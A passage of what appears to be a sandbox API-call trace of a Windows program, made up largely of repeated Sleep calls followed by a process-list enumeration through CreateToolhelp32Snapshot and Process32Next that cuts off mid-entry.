[0286.198] Sleep (dwMilliseconds=0x258) [0286.217] Sleep (dwMilliseconds=0x258) [0286.256] Sleep (dwMilliseconds=0x258) [0286.286] Sleep (dwMilliseconds=0x258) [0286.288] Sleep (dwMilliseconds=0x258) [0286.295] Sleep (dwMilliseconds=0x258) [0286.330] Sleep (dwMilliseconds=0x258) [0286.372] Sleep (dwMilliseconds=0x258) [0286.376] Sleep (dwMilliseconds=0x258) [0286.378] Sleep (dwMilliseconds=0x258) [0286.420] Sleep (dwMilliseconds=0x258) [0286.456] Sleep (dwMilliseconds=0x258) [0286.471] Sleep (dwMilliseconds=0x258) [0286.495] Sleep (dwMilliseconds=0x258) [0286.530] Sleep (dwMilliseconds=0x258) [0286.550] Sleep (dwMilliseconds=0x258) [0286.551] Sleep (dwMilliseconds=0x258) [0286.571] Sleep (dwMilliseconds=0x258) [0286.606] Sleep (dwMilliseconds=0x258) [0286.631] Sleep (dwMilliseconds=0x258) [0286.644] Sleep (dwMilliseconds=0x258) [0286.687] Sleep (dwMilliseconds=0x258) [0286.719] Sleep (dwMilliseconds=0x258) [0286.724] Sleep (dwMilliseconds=0x258) [0286.759] Sleep (dwMilliseconds=0x258) [0286.796] Sleep (dwMilliseconds=0x258) [0286.800] Sleep (dwMilliseconds=0x258) [0286.866] Sleep (dwMilliseconds=0x258) [0286.903] Sleep (dwMilliseconds=0x258) [0286.915] Sleep (dwMilliseconds=0x258) [0286.993] Sleep (dwMilliseconds=0x258) [0287.043] Sleep (dwMilliseconds=0x258) [0287.063] Sleep (dwMilliseconds=0x258) [0287.065] Sleep (dwMilliseconds=0x258) [0287.084] Sleep (dwMilliseconds=0x258) [0287.125] Sleep (dwMilliseconds=0x258) [0287.153] Sleep (dwMilliseconds=0x258) [0287.167] Sleep (dwMilliseconds=0x258) [0287.206] Sleep (dwMilliseconds=0x258) [0287.243] Sleep (dwMilliseconds=0x258) [0287.246] Sleep (dwMilliseconds=0x258) [0287.255] Sleep (dwMilliseconds=0x258) [0287.288] Sleep (dwMilliseconds=0x258) [0287.324] Sleep (dwMilliseconds=0x258) [0287.340] Sleep (dwMilliseconds=0x258) [0287.342] Sleep (dwMilliseconds=0x258) [0287.369] Sleep (dwMilliseconds=0x258) [0287.409] Sleep (dwMilliseconds=0x258) [0287.436] Sleep (dwMilliseconds=0x258) [0287.440] Sleep (dwMilliseconds=0x258) [0287.451] Sleep (dwMilliseconds=0x258) [0287.487] Sleep (dwMilliseconds=0x258) [0287.523] Sleep (dwMilliseconds=0x258) [0287.524] Sleep (dwMilliseconds=0x258) [0287.526] Sleep (dwMilliseconds=0x258) [0287.561] Sleep (dwMilliseconds=0x258) [0287.598] Sleep (dwMilliseconds=0x258) [0287.607] Sleep (dwMilliseconds=0x258) [0287.609] Sleep (dwMilliseconds=0x258) [0287.637] Sleep (dwMilliseconds=0x258) [0287.674] Sleep (dwMilliseconds=0x258) [0287.690] Sleep (dwMilliseconds=0x258) [0287.696] Sleep (dwMilliseconds=0x258) [0287.715] Sleep (dwMilliseconds=0x258) [0287.750] Sleep (dwMilliseconds=0x258) [0287.777] Sleep (dwMilliseconds=0x258) [0287.793] Sleep (dwMilliseconds=0x258) [0287.843] Sleep (dwMilliseconds=0x258) [0287.881] Sleep (dwMilliseconds=0x258) [0287.883] Sleep (dwMilliseconds=0x258) [0287.889] Sleep (dwMilliseconds=0x258) [0287.928] Sleep (dwMilliseconds=0x258) [0287.973] Sleep (dwMilliseconds=0x258) [0287.976] Sleep (dwMilliseconds=0x258) [0287.977] Sleep (dwMilliseconds=0x258) [0288.012] Sleep (dwMilliseconds=0x258) [0288.051] Sleep (dwMilliseconds=0x258) [0288.057] Sleep (dwMilliseconds=0x258) [0288.059] Sleep (dwMilliseconds=0x258) [0288.087] Sleep (dwMilliseconds=0x258) [0288.213] Sleep (dwMilliseconds=0x258) [0288.242] Sleep (dwMilliseconds=0x258) [0288.262] Sleep (dwMilliseconds=0x258) [0288.299] Sleep (dwMilliseconds=0x258) [0288.327] Sleep (dwMilliseconds=0x258) [0288.331] Sleep (dwMilliseconds=0x258) [0288.339] Sleep (dwMilliseconds=0x258) [0288.375] Sleep (dwMilliseconds=0x258) [0288.411] Sleep (dwMilliseconds=0x258) [0288.412] Sleep (dwMilliseconds=0x258) [0288.449] Sleep (dwMilliseconds=0x258) [0288.486] Sleep (dwMilliseconds=0x258) [0288.494] Sleep (dwMilliseconds=0x258) [0288.495] Sleep (dwMilliseconds=0x258) [0288.523] Sleep (dwMilliseconds=0x258) [0288.562] Sleep (dwMilliseconds=0x258) [0288.580] Sleep (dwMilliseconds=0x258) [0288.581] Sleep (dwMilliseconds=0x258) [0288.604] Sleep (dwMilliseconds=0x258) [0288.640] Sleep (dwMilliseconds=0x258) [0288.665] Sleep (dwMilliseconds=0x258) [0288.666] Sleep (dwMilliseconds=0x258) [0288.678] Sleep (dwMilliseconds=0x258) [0288.713] Sleep (dwMilliseconds=0x258) [0288.745] Sleep (dwMilliseconds=0x258) [0288.747] Sleep (dwMilliseconds=0x258) [0288.751] Sleep (dwMilliseconds=0x258) [0288.786] Sleep (dwMilliseconds=0x258) [0288.845] Sleep (dwMilliseconds=0x258) [0288.850] Sleep (dwMilliseconds=0x258) [0288.851] Sleep (dwMilliseconds=0x258) [0288.895] Sleep (dwMilliseconds=0x258) [0288.930] Sleep (dwMilliseconds=0x258) [0288.945] Sleep (dwMilliseconds=0x258) [0288.968] Sleep (dwMilliseconds=0x258) [0289.013] Sleep (dwMilliseconds=0x258) [0289.038] Sleep (dwMilliseconds=0x258) [0289.056] Sleep (dwMilliseconds=0x258) [0289.090] Sleep (dwMilliseconds=0x258) [0289.122] Sleep (dwMilliseconds=0x258) [0289.129] Sleep (dwMilliseconds=0x258) [0289.164] Sleep (dwMilliseconds=0x258) [0289.200] Sleep (dwMilliseconds=0x258) [0289.214] Sleep (dwMilliseconds=0x258) [0289.216] Sleep (dwMilliseconds=0x258) [0289.280] Sleep (dwMilliseconds=0x258) [0289.428] Sleep (dwMilliseconds=0x258) [0289.441] Sleep (dwMilliseconds=0x258) [0289.442] Sleep (dwMilliseconds=0x258) [0289.478] Sleep (dwMilliseconds=0x258) [0289.520] Sleep (dwMilliseconds=0x258) [0289.544] Sleep (dwMilliseconds=0x258) [0289.558] Sleep (dwMilliseconds=0x258) [0289.593] Sleep (dwMilliseconds=0x258) [0289.621] Sleep (dwMilliseconds=0x258) [0289.623] Sleep (dwMilliseconds=0x258) [0289.634] Sleep (dwMilliseconds=0x258) [0289.670] Sleep (dwMilliseconds=0x258) [0289.705] Sleep (dwMilliseconds=0x258) [0289.708] Sleep (dwMilliseconds=0x258) [0289.742] Sleep (dwMilliseconds=0x258) [0289.781] Sleep (dwMilliseconds=0x258) [0289.789] Sleep (dwMilliseconds=0x258) [0289.806] Sleep (dwMilliseconds=0x258) [0289.871] Sleep (dwMilliseconds=0x258) [0289.922] Sleep (dwMilliseconds=0x258) [0289.941] Sleep (dwMilliseconds=0x258) [0289.961] Sleep (dwMilliseconds=0x258) [0289.997] Sleep (dwMilliseconds=0x258) [0290.022] Sleep (dwMilliseconds=0x258) [0290.034] Sleep (dwMilliseconds=0x258) [0290.070] Sleep (dwMilliseconds=0x258) [0290.110] Sleep (dwMilliseconds=0x258) [0290.115] Sleep (dwMilliseconds=0x258) [0290.177] Sleep (dwMilliseconds=0x258) [0290.213] Sleep (dwMilliseconds=0x258) [0290.237] Sleep (dwMilliseconds=0x258) [0290.239] Sleep (dwMilliseconds=0x258) [0290.274] Sleep (dwMilliseconds=0x258) [0290.311] Sleep (dwMilliseconds=0x258) [0290.327] Sleep (dwMilliseconds=0x258) [0290.329] Sleep (dwMilliseconds=0x258) [0290.351] Sleep (dwMilliseconds=0x258) [0290.386] Sleep (dwMilliseconds=0x258) [0290.407] Sleep (dwMilliseconds=0x258) [0290.408] Sleep (dwMilliseconds=0x258) [0290.424] Sleep (dwMilliseconds=0x258) [0290.460] Sleep (dwMilliseconds=0x258) [0290.494] Sleep (dwMilliseconds=0x258) [0290.525] Sleep (dwMilliseconds=0x258) [0290.561] Sleep (dwMilliseconds=0x258) [0290.596] Sleep (dwMilliseconds=0x258) [0290.603] Sleep (dwMilliseconds=0x258) [0290.604] Sleep (dwMilliseconds=0x258) [0290.634] Sleep (dwMilliseconds=0x258) [0290.669] Sleep (dwMilliseconds=0x258) [0290.685] Sleep (dwMilliseconds=0x258) [0290.686] Sleep (dwMilliseconds=0x258) [0290.709] Sleep (dwMilliseconds=0x258) [0290.747] Sleep (dwMilliseconds=0x258) [0290.770] Sleep (dwMilliseconds=0x258) [0290.771] Sleep (dwMilliseconds=0x258) [0290.789] Sleep (dwMilliseconds=0x258) [0290.840] Sleep (dwMilliseconds=0x258) [0290.894] Sleep (dwMilliseconds=0x258) [0290.912] Sleep (dwMilliseconds=0x258) [0290.951] Sleep (dwMilliseconds=0x258) [0290.987] Sleep (dwMilliseconds=0x258) [0291.001] Sleep (dwMilliseconds=0x258) [0291.003] Sleep (dwMilliseconds=0x258) [0291.028] Sleep (dwMilliseconds=0x258) [0291.062] Sleep (dwMilliseconds=0x258) [0291.083] Sleep (dwMilliseconds=0x258) [0291.100] Sleep (dwMilliseconds=0x258) [0291.136] Sleep (dwMilliseconds=0x258) [0291.165] Sleep (dwMilliseconds=0x258) [0291.173] Sleep (dwMilliseconds=0x258) [0291.210] Sleep (dwMilliseconds=0x258) [0291.245] Sleep (dwMilliseconds=0x258) [0291.259] Sleep (dwMilliseconds=0x258) [0291.295] Sleep (dwMilliseconds=0x258) [0291.332] Sleep (dwMilliseconds=0x258) [0291.339] Sleep (dwMilliseconds=0x258) [0291.340] Sleep (dwMilliseconds=0x258) [0291.371] Sleep (dwMilliseconds=0x258) [0291.410] Sleep (dwMilliseconds=0x258) [0291.425] Sleep (dwMilliseconds=0x258) [0291.427] Sleep (dwMilliseconds=0x258) [0291.450] Sleep (dwMilliseconds=0x258) [0291.485] Sleep (dwMilliseconds=0x258) [0291.510] Sleep (dwMilliseconds=0x258) [0291.512] Sleep (dwMilliseconds=0x258) [0291.527] Sleep (dwMilliseconds=0x258) [0291.562] Sleep (dwMilliseconds=0x258) [0291.593] Sleep (dwMilliseconds=0x258) [0291.600] Sleep (dwMilliseconds=0x258) [0291.635] Sleep (dwMilliseconds=0x258) [0291.680] Sleep (dwMilliseconds=0x258) [0291.717] Sleep (dwMilliseconds=0x258) [0291.754] Sleep (dwMilliseconds=0x258) [0291.791] Sleep (dwMilliseconds=0x258) [0291.805] Sleep (dwMilliseconds=0x258) [0291.807] Sleep (dwMilliseconds=0x258) [0291.852] Sleep (dwMilliseconds=0x258) [0291.899] Sleep (dwMilliseconds=0x258) [0291.928] Sleep (dwMilliseconds=0x258) [0291.930] Sleep (dwMilliseconds=0x258) [0291.941] Sleep (dwMilliseconds=0x258) [0291.976] Sleep (dwMilliseconds=0x258) [0292.019] Sleep (dwMilliseconds=0x258) [0292.020] Sleep (dwMilliseconds=0x258) [0292.058] Sleep (dwMilliseconds=0x258) [0292.094] Sleep (dwMilliseconds=0x258) [0292.103] Sleep (dwMilliseconds=0x258) [0292.105] Sleep (dwMilliseconds=0x258) [0292.138] Sleep (dwMilliseconds=0x258) [0292.178] Sleep (dwMilliseconds=0x258) [0292.195] Sleep (dwMilliseconds=0x258) [0292.221] Sleep (dwMilliseconds=0x258) [0292.264] Sleep (dwMilliseconds=0x258) [0292.299] Sleep (dwMilliseconds=0x258) [0292.307] Sleep (dwMilliseconds=0x258) [0292.346] Sleep (dwMilliseconds=0x258) [0292.384] Sleep (dwMilliseconds=0x258) [0292.388] Sleep (dwMilliseconds=0x258) [0292.390] Sleep (dwMilliseconds=0x258) [0292.422] Sleep (dwMilliseconds=0x258) [0292.462] Sleep (dwMilliseconds=0x258) [0292.475] Sleep (dwMilliseconds=0x258) [0292.479] Sleep (dwMilliseconds=0x258) [0292.507] Sleep (dwMilliseconds=0x258) [0292.544] Sleep (dwMilliseconds=0x258) [0292.579] Sleep (dwMilliseconds=0x258) [0292.586] Sleep (dwMilliseconds=0x258) [0292.627] Sleep (dwMilliseconds=0x258) [0292.664] Sleep (dwMilliseconds=0x258) [0292.672] Sleep (dwMilliseconds=0x258) [0292.700] Sleep (dwMilliseconds=0x258) [0292.741] Sleep (dwMilliseconds=0x258) [0292.761] Sleep (dwMilliseconds=0x258) [0292.793] Sleep (dwMilliseconds=0x258) [0292.915] Sleep (dwMilliseconds=0x258) [0292.958] Sleep (dwMilliseconds=0x258) [0292.962] Sleep (dwMilliseconds=0x258) [0292.964] Sleep (dwMilliseconds=0x258) [0292.997] Sleep (dwMilliseconds=0x258) [0293.046] Sleep (dwMilliseconds=0x258) [0293.068] Sleep (dwMilliseconds=0x258) [0293.070] Sleep (dwMilliseconds=0x258) [0293.091] Sleep (dwMilliseconds=0x258) [0293.132] Sleep (dwMilliseconds=0x258) [0293.164] Sleep (dwMilliseconds=0x258) [0293.166] Sleep (dwMilliseconds=0x258) [0293.175] Sleep (dwMilliseconds=0x258) [0293.209] Sleep (dwMilliseconds=0x258) [0293.245] Sleep (dwMilliseconds=0x258) [0293.246] Sleep (dwMilliseconds=0x258) [0293.248] Sleep (dwMilliseconds=0x258) [0293.282] Sleep (dwMilliseconds=0x258) [0293.327] Sleep (dwMilliseconds=0x258) [0293.339] Sleep (dwMilliseconds=0x258) [0293.341] Sleep (dwMilliseconds=0x258) [0293.366] Sleep (dwMilliseconds=0x258) [0293.402] Sleep (dwMilliseconds=0x258) [0293.424] Sleep (dwMilliseconds=0x258) [0293.425] Sleep (dwMilliseconds=0x258) [0293.443] Sleep (dwMilliseconds=0x258) [0293.477] Sleep (dwMilliseconds=0x258) [0293.511] Sleep (dwMilliseconds=0x258) [0293.518] Sleep (dwMilliseconds=0x258) [0293.553] Sleep (dwMilliseconds=0x258) [0293.592] Sleep (dwMilliseconds=0x258) [0293.598] Sleep (dwMilliseconds=0x258) [0293.599] Sleep (dwMilliseconds=0x258) [0293.631] Sleep (dwMilliseconds=0x258) [0293.673] Sleep (dwMilliseconds=0x258) [0293.689] Sleep (dwMilliseconds=0x258) [0293.691] Sleep (dwMilliseconds=0x258) [0293.713] Sleep (dwMilliseconds=0x258) [0293.749] Sleep (dwMilliseconds=0x258) [0293.774] Sleep (dwMilliseconds=0x258) [0293.787] Sleep (dwMilliseconds=0x258) [0293.823] Sleep (dwMilliseconds=0x258) [0293.881] Sleep (dwMilliseconds=0x258) [0293.882] Sleep (dwMilliseconds=0x258) [0293.885] Sleep (dwMilliseconds=0x258) [0293.923] Sleep (dwMilliseconds=0x258) [0293.960] Sleep (dwMilliseconds=0x258) [0293.969] Sleep (dwMilliseconds=0x258) [0294.003] Sleep (dwMilliseconds=0x258) [0294.039] Sleep (dwMilliseconds=0x258) [0294.142] Sleep (dwMilliseconds=0x258) [0294.160] Sleep (dwMilliseconds=0x258) [0294.198] Sleep (dwMilliseconds=0x258) [0294.227] Sleep (dwMilliseconds=0x258) [0294.239] Sleep (dwMilliseconds=0x258) [0294.275] Sleep (dwMilliseconds=0x258) [0294.309] Sleep (dwMilliseconds=0x258) [0294.313] Sleep (dwMilliseconds=0x258) [0294.358] Sleep (dwMilliseconds=0x258) [0294.396] Sleep (dwMilliseconds=0x258) [0294.406] Sleep (dwMilliseconds=0x258) [0294.407] Sleep (dwMilliseconds=0x258) [0294.437] Sleep (dwMilliseconds=0x258) [0294.474] Sleep (dwMilliseconds=0x258) [0294.495] Sleep (dwMilliseconds=0x258) [0294.513] Sleep (dwMilliseconds=0x258) [0294.552] Sleep (dwMilliseconds=0x258) [0294.621] Sleep (dwMilliseconds=0x258) [0294.630] Sleep (dwMilliseconds=0x258) [0294.707] Sleep (dwMilliseconds=0x258) [0294.745] Sleep (dwMilliseconds=0x258) [0294.754] Sleep (dwMilliseconds=0x258) [0294.783] Sleep (dwMilliseconds=0x258) [0294.821] Sleep (dwMilliseconds=0x258) [0294.886] Sleep (dwMilliseconds=0x258) [0294.905] Sleep (dwMilliseconds=0x258) [0294.944] Sleep (dwMilliseconds=0x258) [0294.977] Sleep (dwMilliseconds=0x258) [0294.983] Sleep (dwMilliseconds=0x258) [0295.018] Sleep (dwMilliseconds=0x258) [0295.054] Sleep (dwMilliseconds=0x258) [0295.057] Sleep (dwMilliseconds=0x258) [0295.059] Sleep (dwMilliseconds=0x258) [0295.092] Sleep (dwMilliseconds=0x258) [0295.128] Sleep (dwMilliseconds=0x258) [0295.140] Sleep (dwMilliseconds=0x258) [0295.142] Sleep (dwMilliseconds=0x258) [0295.165] Sleep (dwMilliseconds=0x258) [0295.202] Sleep (dwMilliseconds=0x258) [0295.222] Sleep (dwMilliseconds=0x258) [0295.224] Sleep (dwMilliseconds=0x258) [0295.424] Sleep (dwMilliseconds=0x258) [0295.468] Sleep (dwMilliseconds=0x258) [0295.501] Sleep (dwMilliseconds=0x258) [0295.508] Sleep (dwMilliseconds=0x258) [0295.549] Sleep (dwMilliseconds=0x258) [0295.592] Sleep (dwMilliseconds=0x258) [0295.608] Sleep (dwMilliseconds=0x258) [0295.638] Sleep (dwMilliseconds=0x258) [0295.676] Sleep (dwMilliseconds=0x258) [0295.695] Sleep (dwMilliseconds=0x258) [0295.718] Sleep (dwMilliseconds=0x258) [0295.756] Sleep (dwMilliseconds=0x258) [0295.787] Sleep (dwMilliseconds=0x258) [0295.798] Sleep (dwMilliseconds=0x258) [0295.873] Sleep (dwMilliseconds=0x258) [0295.910] Sleep (dwMilliseconds=0x258) [0295.915] Sleep (dwMilliseconds=0x258) [0295.916] Sleep (dwMilliseconds=0x258) [0295.953] Sleep (dwMilliseconds=0x258) [0295.990] Sleep (dwMilliseconds=0x258) [0295.999] Sleep (dwMilliseconds=0x258) [0296.000] Sleep (dwMilliseconds=0x258) [0296.026] Sleep (dwMilliseconds=0x258) [0296.064] Sleep (dwMilliseconds=0x258) [0296.083] Sleep (dwMilliseconds=0x258) [0296.085] Sleep (dwMilliseconds=0x258) [0296.101] Sleep (dwMilliseconds=0x258) [0296.136] Sleep (dwMilliseconds=0x258) [0296.169] Sleep (dwMilliseconds=0x258) [0296.174] Sleep (dwMilliseconds=0x258) [0296.211] Sleep (dwMilliseconds=0x258) [0296.249] Sleep (dwMilliseconds=0x258) [0296.255] Sleep (dwMilliseconds=0x258) [0296.287] Sleep (dwMilliseconds=0x258) [0296.323] Sleep (dwMilliseconds=0x258) [0296.341] Sleep (dwMilliseconds=0x258) [0296.363] Sleep (dwMilliseconds=0x258) [0296.399] Sleep (dwMilliseconds=0x258) [0296.428] Sleep (dwMilliseconds=0x258) [0296.578] Sleep (dwMilliseconds=0x258) [0296.625] Sleep (dwMilliseconds=0x258) [0296.699] Sleep (dwMilliseconds=0x258) [0296.753] Sleep (dwMilliseconds=0x258) [0296.758] Sleep (dwMilliseconds=0x258) [0296.759] Sleep (dwMilliseconds=0x258) [0296.795] Sleep (dwMilliseconds=0x258) [0296.867] Sleep (dwMilliseconds=0x258) [0296.884] Sleep (dwMilliseconds=0x258) [0296.906] Sleep (dwMilliseconds=0x258) [0296.945] Sleep (dwMilliseconds=0x258) [0296.975] Sleep (dwMilliseconds=0x258) [0296.986] Sleep (dwMilliseconds=0x258) [0297.023] Sleep (dwMilliseconds=0x258) [0297.062] Sleep (dwMilliseconds=0x258) [0297.064] Sleep (dwMilliseconds=0x258) [0297.100] Sleep (dwMilliseconds=0x258) [0297.138] Sleep (dwMilliseconds=0x258) [0297.146] Sleep (dwMilliseconds=0x258) [0297.176] Sleep (dwMilliseconds=0x258) [0297.213] Sleep (dwMilliseconds=0x258) [0297.230] Sleep (dwMilliseconds=0x258) [0297.251] Sleep (dwMilliseconds=0x258) [0297.287] Sleep (dwMilliseconds=0x258) [0297.312] Sleep (dwMilliseconds=0x258) [0297.313] Sleep (dwMilliseconds=0x258) [0297.331] Sleep (dwMilliseconds=0x258) [0297.366] Sleep (dwMilliseconds=0x258) [0297.398] Sleep (dwMilliseconds=0x258) [0297.404] Sleep (dwMilliseconds=0x258) [0297.439] Sleep (dwMilliseconds=0x258) [0297.501] Sleep (dwMilliseconds=0x258) [0297.505] Sleep (dwMilliseconds=0x258) [0297.506] Sleep (dwMilliseconds=0x258) [0297.543] Sleep (dwMilliseconds=0x258) [0297.578] Sleep (dwMilliseconds=0x258) [0297.592] Sleep (dwMilliseconds=0x258) [0297.620] Sleep (dwMilliseconds=0x258) [0297.692] Sleep (dwMilliseconds=0x258) [0297.709] Sleep (dwMilliseconds=0x258) [0297.710] Sleep (dwMilliseconds=0x258) [0297.730] Sleep (dwMilliseconds=0x258) [0297.766] Sleep (dwMilliseconds=0x258) [0297.791] Sleep (dwMilliseconds=0x258) [0297.805] Sleep (dwMilliseconds=0x258) [0297.865] Sleep (dwMilliseconds=0x258) [0297.898] Sleep (dwMilliseconds=0x258) [0297.903] Sleep (dwMilliseconds=0x258) [0297.908] Sleep (dwMilliseconds=0x258) [0297.942] Sleep (dwMilliseconds=0x258) [0297.979] Sleep (dwMilliseconds=0x258) [0297.985] Sleep (dwMilliseconds=0x258) [0298.017] Sleep (dwMilliseconds=0x258) [0298.052] Sleep (dwMilliseconds=0x258) [0298.066] Sleep (dwMilliseconds=0x258) [0298.090] Sleep (dwMilliseconds=0x258) [0298.130] Sleep (dwMilliseconds=0x258) [0298.156] Sleep (dwMilliseconds=0x258) [0298.157] Sleep (dwMilliseconds=0x258) [0298.174] Sleep (dwMilliseconds=0x258) [0298.209] Sleep (dwMilliseconds=0x258) [0298.249] Sleep (dwMilliseconds=0x258) [0298.251] Sleep (dwMilliseconds=0x258) [0298.289] Sleep (dwMilliseconds=0x258) [0298.327] Sleep (dwMilliseconds=0x258) [0298.332] Sleep (dwMilliseconds=0x258) [0298.333] Sleep (dwMilliseconds=0x258) [0298.366] Sleep (dwMilliseconds=0x258) [0298.401] Sleep (dwMilliseconds=0x258) [0298.414] Sleep (dwMilliseconds=0x258) [0298.416] Sleep (dwMilliseconds=0x258) [0298.440] Sleep (dwMilliseconds=0x258) [0298.484] Sleep (dwMilliseconds=0x258) [0298.509] Sleep (dwMilliseconds=0x258) [0298.523] Sleep (dwMilliseconds=0x258) [0298.561] Sleep (dwMilliseconds=0x258) [0298.598] Sleep (dwMilliseconds=0x258) [0298.634] Sleep (dwMilliseconds=0x258) [0298.679] Sleep (dwMilliseconds=0x258) [0298.700] Sleep (dwMilliseconds=0x258) [0298.701] Sleep (dwMilliseconds=0x258) [0298.727] Sleep (dwMilliseconds=0x258) [0298.765] Sleep (dwMilliseconds=0x258) [0298.788] Sleep (dwMilliseconds=0x258) [0298.789] Sleep (dwMilliseconds=0x258) [0298.804] Sleep (dwMilliseconds=0x258) [0298.908] Sleep (dwMilliseconds=0x258) [0298.942] Sleep (dwMilliseconds=0x258) [0298.944] Sleep (dwMilliseconds=0x258) [0298.949] Sleep (dwMilliseconds=0x258) [0298.985] Sleep (dwMilliseconds=0x258) [0299.022] Sleep (dwMilliseconds=0x258) [0299.028] Sleep (dwMilliseconds=0x258) [0299.030] Sleep (dwMilliseconds=0x258) [0299.062] Sleep (dwMilliseconds=0x258) [0299.099] Sleep (dwMilliseconds=0x258) [0299.119] Sleep (dwMilliseconds=0x258) [0299.121] Sleep (dwMilliseconds=0x258) [0299.146] Sleep (dwMilliseconds=0x258) [0299.187] Sleep (dwMilliseconds=0x258) [0299.208] Sleep (dwMilliseconds=0x258) [0299.225] Sleep (dwMilliseconds=0x258) [0299.261] Sleep (dwMilliseconds=0x258) [0299.290] Sleep (dwMilliseconds=0x258) [0299.299] Sleep (dwMilliseconds=0x258) [0299.335] Sleep (dwMilliseconds=0x258) [0299.381] Sleep (dwMilliseconds=0x258) [0299.418] Sleep (dwMilliseconds=0x258) [0299.504] Sleep (dwMilliseconds=0x258) [0299.520] Sleep (dwMilliseconds=0x258) [0299.522] Sleep (dwMilliseconds=0x258) [0299.554] Sleep (dwMilliseconds=0x258) [0299.590] Sleep (dwMilliseconds=0x258) [0299.608] Sleep (dwMilliseconds=0x258) [0299.609] Sleep (dwMilliseconds=0x258) [0299.630] Sleep (dwMilliseconds=0x258) [0299.668] Sleep (dwMilliseconds=0x258) [0299.693] Sleep (dwMilliseconds=0x258) [0299.715] Sleep (dwMilliseconds=0x258) [0299.752] Sleep (dwMilliseconds=0x258) [0299.784] Sleep (dwMilliseconds=0x258) [0299.792] Sleep (dwMilliseconds=0x258) [0299.846] Sleep (dwMilliseconds=0x258) [0299.894] Sleep (dwMilliseconds=0x258) [0299.898] Sleep (dwMilliseconds=0x258) [0299.932] Sleep (dwMilliseconds=0x258) Thread: id = 59 os_tid = 0x9f0 [0096.257] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xff8 [0096.280] Process32First (in: hSnapshot=0xff8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0096.283] Process32Next (in: hSnapshot=0xff8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x72, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0096.284] Process32Next (in: hSnapshot=0xff8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0096.286] Process32Next (in: hSnapshot=0xff8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0096.288] Process32Next (in: hSnapshot=0xff8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0096.289] Process32Next (in: hSnapshot=0xff8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0096.291] Process32Next (in: hSnapshot=0xff8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0096.292] Process32Next (in: hSnapshot=0xff8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0096.295] Process32Next (in: hSnapshot=0xff8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0096.296] Process32Next (in: hSnapshot=0xff8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0096.298] Process32Next (in: hSnapshot=0xff8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0096.299] Process32Next (in: hSnapshot=0xff8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0096.301] Process32Next (in: hSnapshot=0xff8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0096.304] Process32Next (in: hSnapshot=0xff8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0096.305] Process32Next (in: 